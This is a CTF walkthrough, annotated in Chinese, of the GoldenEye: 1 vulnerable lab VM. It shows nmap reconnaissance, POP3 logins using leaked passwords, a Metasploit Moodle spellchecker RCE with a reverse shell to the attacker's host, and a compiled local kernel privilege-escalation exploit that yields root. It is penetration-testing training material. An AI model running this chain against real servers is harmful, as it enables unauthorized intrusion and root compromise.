Name: GoldenEye: 1 Date release: 4 May 2018 Author: creosote Series: GoldenEye
1 2 3 4 5 6 7 8
Description
I recently got done creating an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.
I'd rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there's a hint of CTF flavor.
I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. Will need to be setup as Host-Only, and on VMware you may need to click "retry" if prompted, upon initially starting it up because of formatting. ## Changelog Beta - 2018-05-02 v1 - 2018-05-04
信息搜集
获取项目地址
1
nmap -sP 10.0.0.0/24
返回
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
┌──(root㉿kali)-[~] └─# nmap -sP 10.0.0.0/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 09:58 CST Nmap scan report for OpenWrt.lan (10.0.0.1) Host is up (0.00073s latency). MAC Address: 00:15:5D:64:C0:01 (Microsoft) Nmap scan report for PC-A.lan (10.0.0.2) Host is up (0.00045s latency). MAC Address: 00:15:5D:64:C0:00 (Microsoft) Nmap scan report for ubuntu.lan (10.0.0.101) Host is up (0.00044s latency). MAC Address: 00:0C:29:75:99:20 (VMware) Nmap scan report for kali.lan (10.0.0.3) Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.07 seconds
确定项目ip为 10.0.0.101
扫描项目端口
1 2 3 4 5 6 7 8 9 10 11 12
┌──(root㉿kali)-[~] └─# nmap 10.0.0.101 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 13:36 CST Nmap scan report for 01.lan (10.0.0.101) Host is up (0.00055s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 25/tcp open smtp 80/tcp open http MAC Address: 00:0C:29:75:99:20 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
var data = [ { GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>" } ];
// //Boris, make sure you update your default password. //My sources say MI6 maybe planning to infiltrate. //Be on the lookout for any suspicious network traffic.... // //I encoded you p@ssword below... // //InvincibleHack3r // //BTW Natalya says she can break your codes //
var allElements = document.getElementsByClassName("typeing"); for (var j = 0; j < allElements.length; j++) { var currentElementId = allElements[j].id; var currentElementIdContent = data[0][currentElementId]; var element = document.getElementById(currentElementId); var devTypeText = currentElementIdContent;
var i = 0, isTag, text; (functiontype() { text = devTypeText.slice(0, ++i); if (text === devTypeText) return; element.innerHTML = text + `<span class='blinker'> </span>`; var char = text.slice(-1); if (char === "<") isTag = true; if (char === ">") isTag = false; if (isTag) returntype(); setTimeout(type, 60); })(); }
┌──(root㉿kali)-[~/100project/001] └─# nmap -p- 10.0.0.101 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 15:37 CST Nmap scan report for 01.lan (10.0.0.101) Host is up (0.00089s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 55006/tcp open unknown 55007/tcp open unknown MAC Address: 00:0C:29:75:99:20 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.15 seconds
┌──(root㉿kali)-[~/100project/001] └─# nmap -p55006,55007 10.0.0.101 -sS -sV -A -T5 Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 15:39 CST Nmap scan report for 01.lan (10.0.0.101) Host is up (0.0011s latency).
PORT STATE SERVICE VERSION 55006/tcp open ssl/pop3 Dovecot pop3d |_pop3-capabilities: AUTH-RESP-CODE PIPELINING UIDL USER SASL(PLAIN) CAPA RESP-CODES TOP |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2018-04-24T03:23:52 |_Not valid after: 2028-04-23T03:23:52 55007/tcp open pop3 Dovecot pop3d |_pop3-capabilities: PIPELINING UIDL SASL(PLAIN) STLS RESP-CODES AUTH-RESP-CODE CAPA USER TOP | ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server | Not valid before: 2018-04-24T03:23:52 |_Not valid after: 2028-04-23T03:23:52 |_ssl-date: TLS randomness does not represent time MAC Address: 00:0C:29:75:99:20 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop
TRACEROUTE HOP RTT ADDRESS 1 1.06 ms 01.lan (10.0.0.101)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.25 seconds
┌──(root㉿kali)-[~/100project/001] └─# nc 10.0.0.101 55007 +OK GoldenEye POP3 Electronic-Mail System user Boris # 输入账号 +OK pass secret1! # 输入密码 +OK Logged in. list +OK 3 messages: 1 544 2 373 3 921 . retr 1 #读取邮件 +OK 544 octets Return-Path: <[email protected]> X-Original-To: boris Delivered-To: boris@ubuntu Received: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id D9E47454B1 for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT) Message-Id: <20180425022326.D9E47454B1@ubuntu> Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT) From: [email protected]
Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here. # 鲍里斯,这是管理员。您可以在此处与同事和学生进行电子交流。我不会扫描电子邮件是否存在安全风险,因为我相信你和这里的其他管理员 . retr 2 +OK 373 octets Return-Path: <natalya@ubuntu> X-Original-To: boris Delivered-To: boris@ubuntu Received: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id C3F2B454B1 for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT) Message-Id: <20180425024249.C3F2B454B1@ubuntu> Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT) From: natalya@ubuntu Boris, I can break your codes! . retr 3 +OK 921 octets Return-Path: <[email protected]> X-Original-To: boris Delivered-To: boris@ubuntu Received: from janus (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id 4B9F4454B1 for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT) Message-Id: <20180425025235.4B9F4454B1@ubuntu> Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT) From: [email protected] Boris, Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn! Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages.... PS - Keep security tight or we will be compromised. # 鲍里斯, # 您与我们辛迪加的合作将获得丰厚回报。附件是 GoldenEye 的最终访问代码。将它们放在此服务器根目录中的隐藏文件中,然后从该电子邮件中删除。这些访问代码只能有一组,我们需要保护它们以供最终执行。如果他们被找回并被俘虏,我们的计划将会崩溃和燃烧! # 一旦 Xenia 进入培训站点并熟悉 GoldenEye 终端代码,我们将进入最后阶段...... PS - 保持安全,否则我们将受到威胁
┌──(root㉿kali)-[~/100project/001] └─# nc 10.0.0.101 55007 +OK GoldenEye POP3 Electronic-Mail System user Natalya +OK pass bird +OK Logged in. list +OK 2 messages: 1 631 2 1048 . retr 1 +OK 631 octets Return-Path: <root@ubuntu> X-Original-To: natalya Delivered-To: natalya@ubuntu Received: from ok (localhost [127.0.0.1]) by ubuntu (Postfix) with ESMTP id D5EDA454B1 for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT) Message-Id: <20180425024542.D5EDA454B1@ubuntu> Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT) From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you. Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus. #娜塔莉亚,请你不要再破坏鲍里斯的密码了。此外,您是 GNO 培训主管。一旦学生被指定给您,我将通过电子邮件发送给您。 #此外,请注意可能的网络漏洞。我们获悉 GoldenEye 正受到一个名为 Janus 的犯罪集团的追捕 . retr 2 +OK 1048 octets Return-Path: <root@ubuntu> X-Original-To: natalya Delivered-To: natalya@ubuntu Received: from root (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id 17C96454B1 for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT) Message-Id: <20180425031956.17C96454B1@ubuntu> Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT) From: root@ubuntu Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)
Ok, user creds are:
username: xenia password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir **Make sure to edit your host file since you usually work remote off-network.... Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
┌──(root㉿kali)-[~/100project/001] └─# nc 10.0.0.101 55007 +OK GoldenEye POP3 Electronic-Mail System user doak +OK pass goat +OK Logged in. list +OK 1 messages: 1 606 . retr 1 +OK 606 octets Return-Path: <doak@ubuntu> X-Original-To: doak Delivered-To: doak@ubuntu Received: from doak (localhost [127.0.0.1]) by ubuntu (Postfix) with SMTP id 97DC24549D for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT) Message-Id: <20180425034731.97DC24549D@ubuntu> Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT) From: doak@ubuntu
James, If you're reading this, congrats you've gotten this far. You know how tradecraft works right?
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information...... username: dr_doak password: 4England! .
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/moodle_spelling_path_rce
使用exp
1 2 3 4 5 6 7 8 9 10
msfconsole ---进入MSF框架攻击界面 search moodle ---查找 moodle类型 攻击的模块 use 0 ---调用0 exploit/multi/http/moodle_cmd_exec调用攻击脚本 set username admin ---设置用户名:admin set password xWinter1995x! ---设置密码:xWinter1995x! set rhost severnaya-station.com ---设置:rhosts severnaya-station.com set targeturi /gnocertdir ---设置目录: /gnocertdir set payload cmd/unix/reverse ---设置payload:cmd/unix/reverse set lhost 10.0.0.3 ---设置:lhost 10.0.0.3(需要本地IP) run ----执行命令
Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes Password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using -Metasploit RPORT 80 yes The target port (TCP) SESSKEY no The session key of the user to impersonate SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /moodle/ yes The URI of the Moodle installation USERNAME admin yes Username to authenticate with VHOST no HTTP server virtual host
Exploit target:
Id Name -- ---- 0 Automatic
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set password xWinter1995x! password => xWinter1995x! msf6 exploit(multi/http/moodle_spelling_binary_rce) > set rhost severnaya-station.com rhost => severnaya-station.com msf6 exploit(multi/http/moodle_spelling_binary_rce) > set targeturi /gnocertdir targeturi => /gnocertdir msf6 exploit(multi/http/moodle_spelling_binary_rce) > set payload cmd/unix/reverse payload => cmd/unix/reverse msf6 exploit(multi/http/moodle_spelling_binary_rce) > set lhost 10.0.0.3 lhost => 10.0.0.3 msf6 exploit(multi/http/moodle_spelling_binary_rce) > run
[*] Started reverse TCP double handler on 10.0.0.3:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected [*] Authenticating as user: admin [*] Getting session key to update spellchecker if no session key was specified [*] Updating spellchecker to use the system aspell [*] Triggering payload [*] Exploit completed, but no session was created.
msf6 exploit(multi/http/moodle_spelling_binary_rce) > run
[*] Started reverse TCP double handler on 10.0.0.3:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected [*] Authenticating as user: admin [*] Getting session key to update spellchecker if no session key was specified [*] Updating spellchecker to use the system aspell [*] Triggering payload [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 7YPpFMOnfF8gG8B3; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "7YPpFMOnfF8gG8B3\r\n" [*] Matching... [*] B is input... whoami[*] Command shell session 2 opened (10.0.0.3:4444 -> 10.0.0.101:47575) at 2022-08-26 11:16:45 +0800
python -c "import pty;pty.spawn('/bin/bash')" <ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /tmp cd /tmp www-data@01:/tmp$ uname -a uname -a Linux 01 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux www-data@01:/tmp$
www-data@01:/tmp$ cc 1.c -o exp cc 1.c -o exp 1.c:62:1: warning: control may reach end of non-void function [-Wreturn-type] } ^ 1.c:74:12: warning: implicit declaration of function'unshare' is invalid in C99 [-Wimplicit-function-declaration] if(unshare(CLONE_NEWUSER) != 0) ^ 1.c:79:17: warning: implicit declaration of function'clone' is invalid in C99 [-Wimplicit-function-declaration] clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); ^ 1.c:85:13: warning: implicit declaration of function'waitpid' is invalid in C99 [-Wimplicit-function-declaration] waitpid(pid, &status, 0); ^ 1.c:95:5: warning: implicit declaration of function'wait' is invalid in C99 [-Wimplicit-function-declaration] wait(NULL); ^ 5 warnings generated. www-data@01:/tmp$ ./exp ./exp spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id id uid=0(root) gid=0(root) groups=0(root),33(www-data) #